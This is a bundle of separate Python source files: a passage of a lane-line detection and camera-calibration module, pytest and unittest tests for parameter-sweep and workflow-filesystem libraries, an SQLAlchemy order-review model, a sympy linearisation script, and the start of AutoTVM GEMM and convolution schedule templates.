                # left_poly_coeff[2] = leftLine.getRecentPolyCoeff()[-1][2]
                # overwrite the 1st and 2nd coeff with the values of the right line
                # left_poly_coeff[0] = right_poly_coeff[0]
                # left_poly_coeff[1] = right_poly_coeff[1]
                statement = "left is faulty - will be corrected"
            else:
                # right is faulty
                # print('right is faulty')
                right_poly_coeff = rightLine.getBestPolyCoeff()
                # get the coeffs of last frame
                # right_poly_coeff[2] = rightLine.getRecentPolyCoeff()[-1][2]
                # overwrite the 1st and 2nd coeff with the values of the left line
                # right_poly_coeff[0] = left_poly_coeff[0]
                # right_poly_coeff[1] = left_poly_coeff[1]
                statement = "right is faulty - will be corrected"
    return left_poly_coeff, right_poly_coeff, statement
def findLinesSimple(binary_warped, left_fit, right_fit):
    '''
    searches for line pixels near the polynomials found in the last frame
    binary_warped: binary image from birds eye view
    left_fit: previous polynomial coefficients of the left line
    right_fit: previous polynomial coefficients of the right line
    return: visualization image, new left coefficients, new right coefficients

    Bug fix: the visualization referenced `ploty`, `left_fitx` and
    `right_fitx`, which only existed in commented-out code, and looped
    `range(0, ploty)` over an array -- a guaranteed NameError/TypeError.
    The plot values are now generated from the new fits and the lane area
    is filled row by row with proper, clipped integer indices.
    '''
    # coordinates of all set pixels
    nonzero = binary_warped.nonzero()
    nonzeroy = np.array(nonzero[0])
    nonzerox = np.array(nonzero[1])
    margin = 100
    # keep only the pixels within +/- margin of last frame's polynomials
    left_lane_inds = ((nonzerox > (left_fit[0]*(nonzeroy**2) + left_fit[1]*nonzeroy + left_fit[2] - margin)) & (nonzerox < (left_fit[0]*(nonzeroy**2) + left_fit[1]*nonzeroy + left_fit[2] + margin)))
    right_lane_inds = ((nonzerox > (right_fit[0]*(nonzeroy**2) + right_fit[1]*nonzeroy + right_fit[2] - margin)) & (nonzerox < (right_fit[0]*(nonzeroy**2) + right_fit[1]*nonzeroy + right_fit[2] + margin)))
    # extract left and right line pixel positions
    leftx = nonzerox[left_lane_inds]
    lefty = nonzeroy[left_lane_inds]
    rightx = nonzerox[right_lane_inds]
    righty = nonzeroy[right_lane_inds]
    # fit a second order polynomial to each line
    left_fit = np.polyfit(lefty, leftx, 2)
    right_fit = np.polyfit(righty, rightx, 2)
    # generate x and y values for the visualization
    ploty = np.linspace(0, binary_warped.shape[0]-1, binary_warped.shape[0])
    left_fitx = left_fit[0]*ploty**2 + left_fit[1]*ploty + left_fit[2]
    right_fitx = right_fit[0]*ploty**2 + right_fit[1]*ploty + right_fit[2]
    # paint the detected lane area blue on an RGB copy of the input
    out_img = np.dstack((binary_warped, binary_warped, binary_warped)) * 255
    width = binary_warped.shape[1]
    for row in range(len(ploty)):
        # clip to the image so extreme fits cannot index out of bounds
        x_lo = int(max(0, min(width, left_fitx[row])))
        x_hi = int(max(0, min(width, right_fitx[row])))
        out_img[int(ploty[row]), x_lo:x_hi] = [0, 0, 255]
    return out_img, left_fit, right_fit
def findLines(binary_warped):
    '''
    searches for lane lines from scratch with a sliding-window search
    binary_warped: binary image from birds eye view
    return: visualization image, left polyfit coefficients, right polyfit coefficients

    Fix: `np.int(...)` was deprecated in NumPy 1.20 and removed in 1.24;
    replaced with the builtin int().
    '''
    # Take a histogram of the bottom half of the image
    histogram = np.sum(binary_warped[binary_warped.shape[0]//2:,:], axis=0)
    # Create an output image to draw on and visualize the result
    out_img = np.dstack((binary_warped, binary_warped, binary_warped))*255
    # Find the peak of the left and right halves of the histogram
    # These will be the starting point for the left and right lines
    midpoint = int(histogram.shape[0]/2)
    leftx_base = np.argmax(histogram[:midpoint])
    rightx_base = np.argmax(histogram[midpoint:]) + midpoint
    # Choose the number of sliding windows
    nwindows = 9
    # Set height of windows
    window_height = int(binary_warped.shape[0]/nwindows)
    # Identify the x and y positions of all nonzero pixels in the image
    nonzero = binary_warped.nonzero()
    nonzeroy = np.array(nonzero[0])
    nonzerox = np.array(nonzero[1])
    # Current positions to be updated for each window
    leftx_current = leftx_base
    rightx_current = rightx_base
    # Set the width of the windows +/- margin
    margin = 100
    # Set minimum number of pixels found to recenter window
    minpix = 50
    # Create empty lists to receive left and right lane pixel indices
    left_lane_inds = []
    right_lane_inds = []
    # Step through the windows one by one, bottom to top
    for window in range(nwindows):
        # Identify window boundaries in x and y (and right and left)
        win_y_low = binary_warped.shape[0] - (window+1)*window_height
        win_y_high = binary_warped.shape[0] - window*window_height
        win_xleft_low = leftx_current - margin
        win_xleft_high = leftx_current + margin
        win_xright_low = rightx_current - margin
        win_xright_high = rightx_current + margin
        # Draw the windows on the visualization image
        cv2.rectangle(out_img,(win_xleft_low,win_y_low),(win_xleft_high,win_y_high),(0,255,0), 2)
        cv2.rectangle(out_img,(win_xright_low,win_y_low),(win_xright_high,win_y_high),(0,255,0), 2)
        # Identify the nonzero pixels in x and y within the window
        good_left_inds = ((nonzeroy >= win_y_low) & (nonzeroy < win_y_high) & (nonzerox >= win_xleft_low) & (nonzerox < win_xleft_high)).nonzero()[0]
        good_right_inds = ((nonzeroy >= win_y_low) & (nonzeroy < win_y_high) & (nonzerox >= win_xright_low) & (nonzerox < win_xright_high)).nonzero()[0]
        # Append these indices to the lists
        left_lane_inds.append(good_left_inds)
        right_lane_inds.append(good_right_inds)
        # If you found > minpix pixels, recenter next window on their mean position
        if len(good_left_inds) > minpix:
            leftx_current = int(np.mean(nonzerox[good_left_inds]))
        if len(good_right_inds) > minpix:
            rightx_current = int(np.mean(nonzerox[good_right_inds]))
    # Concatenate the arrays of indices
    left_lane_inds = np.concatenate(left_lane_inds)
    right_lane_inds = np.concatenate(right_lane_inds)
    # Extract left and right line pixel positions
    leftx = nonzerox[left_lane_inds]
    lefty = nonzeroy[left_lane_inds]
    rightx = nonzerox[right_lane_inds]
    righty = nonzeroy[right_lane_inds]
    # Fit a second order polynomial to each
    left_fit = np.polyfit(lefty, leftx, 2)
    right_fit = np.polyfit(righty, rightx, 2)
    # Color the detected pixels: left line red, right line blue
    out_img[nonzeroy[left_lane_inds], nonzerox[left_lane_inds]] = [255, 0, 0]
    out_img[nonzeroy[right_lane_inds], nonzerox[right_lane_inds]] = [0, 0, 255]
    return out_img, left_fit, right_fit
def transformToBirdsView(img):
    '''
    transforms an image from a front facing camera to birds-eye-view
    the transformation is made by a fixed source -> destination mapping that has been measured from sample photos with straight lane lines
    img: input image
    return: (warped image, [source figure, warped figure], M, Minv)
            -- the two matplotlib figures visualize the mapped polygons,
            M/Minv are the forward/inverse perspective matrices
    '''
    # define source points (trapezoid around the lane in the camera view)
    src_xindent_lower = 200
    src_xindent_upper = 595
    src_yindent_upper = 460
    # define source points for transformation
    src = np.float32( [[ src_xindent_lower, img.shape[0] ],               # left lower corner
                       [ img.shape[1]-src_xindent_lower, img.shape[0] ],  # right lower corner
                       [ img.shape[1]-src_xindent_upper, src_yindent_upper ],  # right upper corner
                       [ src_xindent_upper, src_yindent_upper ] ] )       # left upper corner
    # define destination points (rectangle in the birds-eye view)
    dst_xindent_lower = 300
    # define destination points for transformation
    dst = np.float32( [[ dst_xindent_lower, img.shape[0] ],               # left lower corner
                       [ img.shape[1]-dst_xindent_lower, img.shape[0] ],  # right lower corner
                       [ img.shape[1]-dst_xindent_lower, 0 ],             # right upper corner
                       [ dst_xindent_lower, 0 ] ] )                       # left upper corner
    # visualize source points: draw the closed source polygon on the input
    fig,ax = plt.subplots(1)
    ax.imshow(img)
    verts = np.copy(src)
    # print(verts.shape)
    # close the polygon by appending the first vertex again
    verts = np.vstack([verts, verts[0]])
    codes = [ Path.MOVETO,
              Path.LINETO,
              Path.LINETO,
              Path.LINETO,
              Path.CLOSEPOLY,
              ]
    path = Path(verts, codes)
    patch = patches.PathPatch(path, edgecolor='r', facecolor='none', lw=2)
    ax.add_patch(patch)
    # plt.show()
    # create transformation matrix (and its inverse for warping back)
    M = cv2.getPerspectiveTransform(src, dst)
    Minv = cv2.getPerspectiveTransform(dst, src)
    img_size = (img.shape[1], img.shape[0])
    # transformation
    warped = cv2.warpPerspective(img, M, img_size, flags=cv2.INTER_LINEAR)
    # show result: draw the destination polygon on the warped image
    fig2, ax2 = plt.subplots(1)
    ax2.imshow(warped)
    # plot dst points on image
    verts2 = np.copy(dst)
    # print(verts2.shape)
    verts2 = np.vstack([verts2, verts2[0]])
    path = Path(verts2, codes)
    patch = patches.PathPatch(path, edgecolor='r', facecolor='none', lw=2)
    ax2.add_patch(patch)
    # plt.show()
    # plt.clf()
    return warped, [fig, fig2], M, Minv
def combineBinaries(listBinaries):
    '''
    combines 2 binary masks into a single one via logical OR
    listBinaries: list of 2 binary (0/1) arrays of equal shape
    return: binary array that is 1 wherever either input is 1

    Fix: removed the unused `color_binary` debug stack that was computed
    and immediately discarded on every call.
    '''
    combined_binary = np.zeros_like(listBinaries[0])
    combined_binary[(listBinaries[0] == 1) | (listBinaries[1] == 1)] = 1
    return combined_binary
def getBinarySHls(rgb, s_thresh):
    '''
    isolates the S channel of HLS colorspace and creates a thresholded binary
    rgb: input image in RGB colorspace
    s_thresh: (min, max) -- pixels with min < S <= max become 1
    return: binary image of the thresholded S channel
    '''
    # convert to HLS and pull out the saturation channel
    saturation = cv2.cvtColor(rgb, cv2.COLOR_RGB2HLS)[:, :, 2]
    lo, hi = s_thresh
    # boolean mask -> 0/1 array of the channel's dtype
    mask = (saturation > lo) & (saturation <= hi)
    return mask.astype(saturation.dtype)
def getBinaryBLab(rgb, b_thresh):
    '''
    isolates the b channel of LAB colorspace and creates a thresholded binary
    rgb: input image in RGB colorspace
    b_thresh: tuple of (min, max) threshold for the binary generation
    return: binary image of the thresholded b channel of an image in LAB colorspace
    '''
    # convert to LAB and pick out the b (blue-yellow) channel in one step
    b_channel = cv2.cvtColor(rgb, cv2.COLOR_RGB2LAB)[:, :, 2]
    # mark every pixel whose b value lies in (min, max]
    lo, hi = b_thresh
    binary_output = np.zeros_like(b_channel)
    binary_output[(b_channel > lo) & (b_channel <= hi)] = 1
    return binary_output
def getBinaryLLuv(rgb, l_thresh):
    '''
    isolates the l channel of LUV colorspace and creates a thresholded binary
    rgb: input image in RGB colorspace
    l_thresh: tuple of (min, max) threshold for the binary generation
    return: binary image of the thresholded l channel of an image in LUV colorspace
    '''
    # convert to LUV and pick out the lightness channel in one step
    l_channel = cv2.cvtColor(rgb, cv2.COLOR_RGB2LUV)[:, :, 0]
    # mark every pixel whose lightness lies in (min, max]
    lo, hi = l_thresh
    binary_output = np.zeros_like(l_channel)
    binary_output[(l_channel > lo) & (l_channel <= hi)] = 1
    return binary_output
def getBinaryMagSobelXY(gray, sobel_kernel, mag_sobelxy_thresh):
    '''
    calculates the magnitude of the sobel gradient and creates a thresholded binary
    gray: input image in grayscale
    sobel_kernel: size of the sobel kernel
    mag_sobelxy_thresh: tuple of (min, max) threshold for the binary generation
    return: binary image of the thresholded magnitude of the sobel-xy operator
    '''
    # gradients in x and y direction
    grad_x = cv2.Sobel(gray, cv2.CV_64F, 1, 0, ksize=sobel_kernel)
    grad_y = cv2.Sobel(gray, cv2.CV_64F, 0, 1, ksize=sobel_kernel)
    # gradient magnitude, rescaled to the full 8-bit range
    magnitude = np.sqrt(grad_x ** 2 + grad_y ** 2)
    scaled = np.uint8(255 * magnitude / np.max(magnitude))
    # keep pixels whose scaled magnitude falls inside [min, max]
    lo, hi = mag_sobelxy_thresh
    binary_output = np.zeros_like(scaled)
    binary_output[(scaled >= lo) & (scaled <= hi)] = 1
    return binary_output
def calibrateCamera(calDir):
    '''
    function to calibrate camera with several images of a chessboard 9x6, taken with that camera
    calDir: directory with camera calibration images
    return[0] ret: True if calibration was successful
    return[1] mtx: calibration matrix
    return[2] dist: distortion coefficients
    return[3] rvecs: rotation vectors for camera position in the world
    return[4] tvecs: translation vectors for camera position in the world
    raises: ValueError if no chessboard corners were found in any image
    '''
    # calibration save file (cache of a previous successful run)
    calibrationPkl = calDir + '/.calibration.pkl'
    # if one exists, then the calibration can be loaded from there instead of new calculation
    if os.path.isfile(calibrationPkl):
        log('info', 'precalculated calibration file found - loading that: ' + calibrationPkl)
        # Fixed: open the pickle via a context manager so the handle is closed
        with open(calibrationPkl, "rb") as pklFile:
            [ret, mtx, dist, rvecs, tvecs] = pickle.load(pklFile)
        return ret, mtx, dist, rvecs, tvecs
    # Arrays to store object points and image points from all the images.
    objpoints = []  # 3d point in real world space
    imgpoints = []  # 2d points in image plane.
    # prepare object points, like (0,0,0), (1,0,0), (2,0,0) ....,(6,5,0)
    # for 9 * 6 corner points
    objp = np.zeros((6 * 9, 3), np.float32)
    objp[:, :2] = np.mgrid[0:9, 0:6].T.reshape(-1, 2)
    fnameImages = glob.glob(calDir + '/*')
    gray = None
    # for every image
    # collect the image points and the object points (these are the same for every image)
    for fname in fnameImages:
        # read image
        img = cv2.imread(fname)
        # convert to grayscale
        gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
        # find the chess board corners
        ret, corners = cv2.findChessboardCorners(gray, (9, 6), None)
        # If found, add object points, image points (after refining them)
        if ret:
            # os.path.basename is portable, unlike splitting on '/'
            log('info', 'chess board corners found in image ' + os.path.basename(fname))
            objpoints.append(objp)
            imgpoints.append(corners)
        else:
            log('warn', 'skipping - chess board corners NOT found in image ' + os.path.basename(fname))
    # Fixed: the original crashed with a NameError on `gray` (and fed empty
    # point lists to OpenCV) when no image yielded corners; fail explicitly.
    if not objpoints:
        raise ValueError('no chessboard corners found in any image in ' + calDir)
    # calibrate camera
    ret, mtx, dist, rvecs, tvecs = cv2.calibrateCamera(objpoints, imgpoints, gray.shape[::-1], None, None)
    # write calibration as file pkl to avoid next time calculation
    log('info', "writing camera calibration to pickle " + calibrationPkl)
    with open(calibrationPkl, "wb") as pklFile:
        pickle.dump([ret, mtx, dist, rvecs, tvecs], pklFile)
    # return
    return ret, mtx, dist, rvecs, tvecs
import os
import string
import numpy as np
import pytest
from experiment import Experiment, Parameter
from .util import get_output_dir
# Get name of output directory, and create it if it doesn't exist
# (shared by every test in this module; each test adds its own per-seed subdir)
output_dir = get_output_dir("Experiment")
@pytest.mark.parametrize(
    "seed, plot",
    [(491, True), (6940, False), (2903, False)]
)
def test_find_best_parameters(seed, plot):
    """ Test that the Experiment.find_best_parameters method does indeed find
    the best parameters. As an objective function we use the norm of the inputs,
    for which the best parameters are the ones which have the lowest absolute
    value, and check that the best values are found. Also test plotting the best
    parameters """
    # Set the random seed so the test is reproducible
    np.random.seed(seed)
    # Set the number of parameters
    if plot:
        # If plotting, only use a small number of parameters to save time
        num_params = 3
    else:
        # Otherwise use a larger random number of parameters
        num_params = np.random.randint(5, 10)
    # Define the function that will be called by the Experiment object
    def run_experiment(**kwargs):
        """ Objective function: the norm of the input values """
        # Check that we have the right number of inputs
        assert len(kwargs) == num_params
        # Return the norm of the input values
        return np.linalg.norm(list(kwargs.values()))
    # Get the output directory name, and create it if it doesn't exist already
    test_output_dir = os.path.join(
        output_dir,
        "test_find_best_parameters",
        "seed = %i" % seed
    )
    if not os.path.isdir(test_output_dir):
        os.makedirs(test_output_dir)
    # Get the output filename and open it
    output_filename = os.path.join(test_output_dir, "output.txt")
    with open(output_filename, "w") as f:
        # Initialise the experiment object
        experiment = Experiment(run_experiment, test_output_dir, output_file=f)
        # Shortcut for adding parameters. Fixed: was a lambda assigned to a
        # name, which PEP 8 (E731) advises against; a def gives a real name.
        def addp(*args):
            experiment.add_parameter(Parameter(*args))
        # Iterate through each parameter
        for i in range(num_params):
            # Choose a unique and valid parameter name
            name = string.ascii_letters[i]
            # Choose a random number of values, range of values, and default
            num_values = np.random.randint(5, 10)
            val_range = np.random.normal(size=num_values)
            default = np.random.choice(val_range)
            # Add the parameter to the Experiment object
            addp(name, default, val_range)
        # Call the method to find the best parameter values
        experiment.find_best_parameters(plot)
        # Iterate through each parameter in the Experiment object
        for param in experiment._param_list:
            # Find the minimum absolute parameter value
            min_abs_val = min(abs(x) for x in param.val_range)
            # Check that the default parameter value is the best one
            assert abs(param.default) == min_abs_val
@pytest.mark.parametrize("seed", [4061, 44, 8589])
def test_sweep_all_parameters(seed):
    """ Test calling the Experiment.sweep_all_parameters method, including that
    the parameters are not updated unless specified """
    # Set the random seed so the test is reproducible
    np.random.seed(seed)
    # Set the number of parameters
    num_params = np.random.randint(5, 10)
    # Define the function that will be called by the Experiment object
    def run_experiment(**kwargs):
        """ Objective function: the norm of the input values """
        # Check that we have the right number of inputs
        assert len(kwargs) == num_params
        # Return the norm of the input values
        return np.linalg.norm(list(kwargs.values()))
    # Get the output directory name, and create it if it doesn't exist already
    test_output_dir = os.path.join(
        output_dir,
        "test_sweep_all_parameters",
        "seed = %i" % seed
    )
    if not os.path.isdir(test_output_dir):
        os.makedirs(test_output_dir)
    # Get the output filename and open it
    output_filename = os.path.join(test_output_dir, "output.txt")
    with open(output_filename, "w") as f:
        # Initialise the experiment object
        experiment = Experiment(run_experiment, test_output_dir, output_file=f)
        # Shortcut for adding parameters. Fixed: was a lambda assigned to a
        # name, which PEP 8 (E731) advises against; a def gives a real name.
        def addp(*args):
            experiment.add_parameter(Parameter(*args))
        # Iterate through each parameter
        for i in range(num_params):
            # Choose a unique and valid parameter name
            name = string.ascii_letters[i]
            # Choose a random number of values and range of values
            num_values = np.random.randint(5, 10)
            val_range = np.random.normal(size=num_values)
            # Set the default value to the worst possible value (largest |x|)
            max_abs_val = max(abs(x) for x in val_range)
            default = [val for val in val_range if abs(val) == max_abs_val][0]
            # Add the parameter to the Experiment object
            addp(name, default, val_range)
        # Get dictionary of original parameter names and defaults
        param_defaults_original = experiment.get_default_param_dictionary()
        # Call the method to sweep over all the parameter values
        f.write("Calling sweep_all_parameters with update_parameters=False\n")
        experiment.sweep_all_parameters(plot=False, update_parameters=False)
        # Get dictionary of updated parameter names and defaults
        param_defaults_new = experiment.get_default_param_dictionary()
        # Assert that the parameter defaults haven't changed
        assert param_defaults_new == param_defaults_original
        # Call the same method, but this time also update the parameters
        f.write("Calling sweep_all_parameters with update_parameters=True\n")
        experiment.sweep_all_parameters(plot=False, update_parameters=True)
        # Get dictionary of updated parameter names and defaults
        param_defaults_new = experiment.get_default_param_dictionary()
        # Assert that this time the parameter defaults HAVE changed
        assert param_defaults_new != param_defaults_original
@pytest.mark.parametrize("seed", [4176, 1959, 2518])
def test_save_results_as_text(seed):
    """ Test calling the Experiment.save_results_as_text method """
    # Set the random seed so the test is reproducible
    np.random.seed(seed)
    # Set the number of parameters
    num_params = np.random.randint(5, 10)
    # Define the function that will be called by the Experiment object
    def run_experiment(**kwargs):
        """ Objective function: the norm of the input values """
        # Check that we have the right number of inputs
        assert len(kwargs) == num_params
        # Return the norm of the input values
        return np.linalg.norm(list(kwargs.values()))
    # Get the output directory name, and create it if it doesn't exist already
    test_output_dir = os.path.join(
        output_dir,
        "test_save_results_as_text",
        "seed = %i" % seed
    )
    if not os.path.isdir(test_output_dir):
        os.makedirs(test_output_dir)
    # Get the output filename and open it
    output_filename = os.path.join(test_output_dir, "output.txt")
    with open(output_filename, "w") as f:
        # Initialise the experiment object
        experiment = Experiment(run_experiment, test_output_dir, output_file=f)
        # Shortcut for adding parameters. Fixed: was a lambda assigned to a
        # name, which PEP 8 (E731) advises against; a def gives a real name.
        def addp(*args):
            experiment.add_parameter(Parameter(*args))
        # Iterate through each parameter
        for i in range(num_params):
            # Choose a unique and valid parameter name
            name = string.ascii_letters[i]
            # Choose a random number of values, range of values, and default
            num_values = np.random.randint(5, 10)
            val_range = np.random.normal(size=num_values)
            default = np.random.choice(val_range)
            # Add the parameter to the Experiment object
            addp(name, default, val_range)
        # Find the best parameter values
        experiment.find_best_parameters(plot=False)
        # Write the results of all experiments to a text file
        experiment.save_results_as_text()
|
# -*- coding: utf-8 -*-
from config import db
class OrderAidanceCheck(db.Model):
    """SQLAlchemy model for the `boss_order_aidance_check` table.

    Records the submit/review ("check") workflow state of an aidance order:
    who submitted it, who reviewed it, the review result and remark.
    """
    __tablename__ = "boss_order_aidance_check"
    id = db.Column(db.Integer, primary_key=True, nullable=False)  # surrogate primary key
    aidance_id = db.Column(db.Integer)  # presumably references the aidance/order row -- TODO confirm
    submit_time = db.Column(db.DateTime)  # when the record was submitted for review
    submit_person = db.Column(db.String(20))  # who submitted it
    check_status = db.Column(db.SmallInteger)  # review status code -- semantics defined elsewhere, confirm
    check_time = db.Column(db.DateTime)  # when the review happened
    check_person = db.Column(db.String(20))  # who reviewed it
    check_remark = db.Column(db.String(200))  # free-text review remark
    sort = db.Column(db.SmallInteger)  # ordering hint
    def __init__(self, aidance_id, submit_time, submit_person, check_status, check_time, check_person, check_remark,
                 sort):
        '''Initialise all non-primary-key columns; `id` is auto-generated.'''
        self.aidance_id = aidance_id
        self.submit_time = submit_time
        self.submit_person = submit_person
        self.check_status = check_status
        self.check_time = check_time
        self.check_person = check_person
        self.check_remark = check_remark
        self.sort = sort
    def __repr__(self):
        # concise identification by primary key only
        return 'id : %s' % self.id
# Client and database attributes dictionary
# NOTE(review): "clinetHead" looks like a typo for "clientHead", but it is a
# module-level name that other modules may import, so it is kept unchanged.
clinetHead = ['id', 'aidanceId', 'submitTime', 'submitPerson', 'checkStatus', 'checkTime', 'checkPerson', 'checkRemark',
              'sort']
# Maps client-side (camelCase) field names to database column (snake_case) names
OrderAidanceCheckChangeDic = {
    "id": "id",
    "aidanceId": "aidance_id",
    "submitTime": "submit_time",
    "submitPerson": "submit_person",
    "checkStatus": "check_status",
    "checkTime": "check_time",
    "checkPerson": "check_person",
    "checkRemark": "check_remark",
    "sort": "sort"
}
# Client-side fields whose values are integers
intList = ['id', 'aidanceId', 'checkStatus', 'sort']
# db.create_all()
|
from sympy import *
from saveAndLoadEquation import *
def main():
    """Linearise the Benney-type evolution equation loaded from benney.txt
    about a base state hbar(z), write the O(delta) equation and its
    normal-mode form to LaTeX/text files, and pretty-print the result."""
    x, y, z, t = symbols("x y z t")
    h = Function("h")(x, z, t)
    hbar = Function("hbar")(z)
    hhat = Function("hhat")(z)
    htilde = Function("htilde")(x, z)
    F1 = Function("F1")(x, z, t)
    F2 = Function("F2")(x, z, t)
    P = Function("P")(x, z, t)
    theta, Re, C = symbols("theta Re C")
    epsilon = symbols("epsilon")
    delta = symbols("delta")
    alpha, beta, omega = symbols("alpha beta omega")
    strings = loadStrings("benney.txt")
    ht = list(map(parse_expr, strings))
    # perturb h = hbar + delta*htilde and expand in the small parameter delta
    ht = series(ht[0].subs(h, hbar + delta*htilde).doit(), delta, 0)
    # the O(delta) coefficient is the linearised evolution equation
    httilde = ht.coeff(delta, 1)
    # Fixed: the original called `f.close` without parentheses (three times),
    # so the files were never explicitly closed; use context managers instead.
    with open('linearised-rivulet-benney-latex.tex', 'w') as f:
        f.write(latex(httilde))
    # substitute the normal-mode ansatz htilde = hhat*exp(i*alpha*x + i*beta*z)
    # and divide the exponential back out
    hthat = powsimp((httilde.subs(htilde, hhat * exp(I * alpha * x + I * beta * z))
                     / exp(I * alpha * x + I * beta * z)).doit().expand()).expand()
    with open('linearised-rivulet-benney-exp-latex.tex', 'w') as f:
        f.write(latex(hthat))
    with open('linearised-rivulet-benney.txt', 'w') as f:
        f.write(str(hthat))
    pprint(hthat)
    print()


if __name__ == "__main__":
    main()
|
import unittest
import jinja2
from woeman.fs import MockFilesystem, normalize_symlinks, unsafe_jinja_split_template_path
from woeman import brick, Input, Output
class FilesystemTests(unittest.TestCase):
    """Tests for Brick filesystem mapping: base paths, input/output directory
    and symlink creation, and absolute path rendering in templates."""

    def testBrickBasePath(self):
        """Test the mapping of Brick parts to filesystem paths."""
        @brick
        class Part:
            def __init__(self):
                self.p_ran = True

            def output(self, result):
                pass

        @brick
        class Experiment:
            def __init__(self):
                self.e_ran = True
                self.part = Part()
                self.parts = [Part()]
                self.mapped = {'zero': Part()}

            def output(self, result):
                result.bind(self.part.result)

        e = Experiment()
        e.setBasePath('/e')
        # plain attribute, list element, and dict value each get a distinct path
        self.assertEqual(e._brick_path, '/e/Experiment')
        self.assertEqual(e.part._brick_path, '/e/Experiment/part')
        self.assertEqual(e.parts[0]._brick_path, '/e/Experiment/parts_0')
        self.assertEqual(e.mapped['zero']._brick_path, '/e/Experiment/mapped_zero')

    def testCreateInOuts(self):
        """Test creation of input/output directory structures and symlinks for Bricks and their parts."""
        unitTest = self

        @brick
        class Part:
            def __init__(self, partInput):
                unitTest.assertTrue(isinstance(partInput, Input))

            def output(self, partResult):
                unitTest.assertTrue(isinstance(partResult, Output))

        @brick
        class Experiment:
            def __init__(self, experimentInput):
                """
                Bricks idiomatically pass only their filesystem inputs as __init__() arguments.
                The actual value of 'experimentInput' received in here is wrapped by the woeman.Input() class
                """
                unitTest.assertTrue(isinstance(experimentInput, Input))
                # Fixed: assertEquals is a deprecated alias of assertEqual
                unitTest.assertEqual(experimentInput.ref, '/data/input')
                self.part = Part(experimentInput)

            def output(self, experimentResult):
                experimentResult.bind(self.part.partResult)

        fs = MockFilesystem()
        e = Experiment('/data/input')
        e.setBasePath('/e')
        e.createInOuts(fs)
        dirs = {
            '/e/Experiment/part/input',
            '/e/Experiment/input',
            '/e/Experiment/part/output',
            '/e/Experiment/output'
        }
        self.assertEqual(fs.dirs, dirs)
        symlinks = {
            '/e/Experiment/input/experimentInput': '/data/input',
            '/e/Experiment/part/input/partInput': '../../input/experimentInput',
            '/e/Experiment/output/experimentResult': '../part/output/partResult'
        }
        # (leftover debug print of fs.symlinks removed)
        self.assertEqual(fs.symlinks, normalize_symlinks(symlinks))
        # test dependencies
        self.assertEqual(e.dependencyFiles('output'), ['part/brick'])

    def testAbsoluteInOutNames(self):
        """Test absolute path generation of Inputs and Outputs in Jinja templates."""
        # allows '..' in the template path, contrary to jinja2 default implementation
        jinja2.loaders.split_template_path = unsafe_jinja_split_template_path

        @brick
        class AbsPaths:
            def __init__(self, input):
                pass

            def output(self, result):
                pass

        fs = MockFilesystem()
        p = AbsPaths('/data/input')
        p.setBasePath('/e')
        p.write(fs)
        # original template: "cat {{ input }} > {{ result }}"
        files = {'/e/AbsPaths/brick.do': 'cat /e/AbsPaths/input/input > /e/AbsPaths/output/result'}
        self.assertEqual(fs.files, files)
|
import tvm
import logging
from tvm import autotvm
import numpy as np
import sys
# Module-level state shared with the AutoTVM template functions below:
function = None  # compute-declaring function, set by auto_schedule()
global_s = None  # appears unused in this chunk -- TODO confirm before removing
global_bufs = None  # appears unused in this chunk -- TODO confirm before removing
@autotvm.template
def GEMMAutoTVM(*args):
    """AutoTVM schedule template for the GEMM compute declared by the
    module-level `function` (set by auto_schedule). Defines split-factor
    knobs for the two spatial axes and the reduction axis, then splits and
    reorders them for tiling."""
    global function
    def getSplit(maxNum):
        # candidate split factors: 1 and powers of two while <= maxNum/2 and
        # <= 32, with 16 removed afterwards (reason not documented here)
        splitList = []
        splitList.append(1)
        para = 2
        while (True):
            if para <= maxNum / 2 and para <= 32:
                splitList.append(para)
                para *= 2
            else:
                break
        if 16 in splitList:
            splitList.remove(16)
        return splitList
    ops, bufs = function(*args)
    s = tvm.create_schedule(ops)
    # the last buffer is the GEMM output tensor
    gemm_tensor = bufs[len(bufs) - 1]
    gemm_op = s[gemm_tensor]
    x = gemm_op.op.axis[1]
    y = gemm_op.op.axis[2]
    k = gemm_op.op.reduce_axis[0]
    cfg = autotvm.get_config()
    # NOTE(review): "split_x" is sized from y's extent and "split_y" from x's
    # extent -- this looks swapped; confirm whether it is intentional.
    cfg.define_knob("split_x", getSplit(int(y.dom.extent)))
    cfg.define_knob("split_k", getSplit(int(k.dom.extent)))
    cfg.define_knob("split_y", getSplit(int(x.dom.extent)))
    xo, xi = gemm_op.split(x, cfg["split_x"].val)
    yo, yi = gemm_op.split(y, cfg["split_y"].val)
    ko, ki = gemm_op.split(k, cfg["split_k"].val)
    gemm_op.reorder(xo, ko, yo, xi, ki, yi)
    # cfg.define_annotate("yi_unroll", [yi], policy='try_unroll')
    # yio, yii = gemm_op.split(yi, factor=4)
    # gemm_op.unroll(yi)
    return s, bufs
@autotvm.template
def CONVAutoTVM(*args):
    """AutoTVM schedule template for a convolution compute (with optional
    bias stage) declared by the module-level `function` (set by
    auto_schedule). Defines split-factor knobs for the conv, pad and bias
    stages and tiles each stage by splitting and reordering its axes."""
    global function
    def getSplit(maxNum):
        # candidate split factors: 1 and powers of two while <= maxNum/2 and
        # <= 32, with 16 removed afterwards (same policy as GEMMAutoTVM)
        splitList = []
        splitList.append(1)
        para = 2
        while (True):
            if para <= maxNum / 2 and para <= 32:
                splitList.append(para)
                para *= 2
            else:
                break
        if 16 in splitList:
            splitList.remove(16)
        return splitList
    ops, bufs = function(*args)
    s = tvm.create_schedule(ops)
    # get bias_tensor, conv_tensor, pad_tensor and their ops relatively
    bias_tensor = None
    conv_tensor = None
    pad_tensor = None
    conv_tensor = bufs[len(bufs) - 1]
    in_tensor2 = conv_tensor.op.input_tensors[1]
    in_tensor1 = conv_tensor.op.input_tensors[0]
    if in_tensor2.op.name == "bias":
        # the last stage is actually the bias add; the real conv is its input
        bias_tensor = conv_tensor
        conv_tensor = in_tensor1
        in_tensor1 = conv_tensor.op.input_tensors[0]
    pad_tensor = in_tensor1
    if bias_tensor != None:
        bias_op = s[bias_tensor]
    conv_op = s[conv_tensor]
    pad_op = s[pad_tensor]
    # get axis
    # conv!
    oc = conv_op.op.axis[1]
    x = conv_op.op.axis[2]
    y = conv_op.op.axis[3]
    ic = conv_op.op.reduce_axis[0]
    kh = conv_op.op.reduce_axis[1]
    kw = conv_op.op.reduce_axis[2]
    # pad!
    pad_x = pad_op.op.axis[2]
    pad_y = pad_op.op.axis[3]
    pad_c = pad_op.op.axis[1]
    # bias
    if bias_tensor != None:
        bias_x = bias_op.op.axis[2]
        bias_y = bias_op.op.axis[3]
        bias_c = bias_op.op.axis[1]
    # define search space!
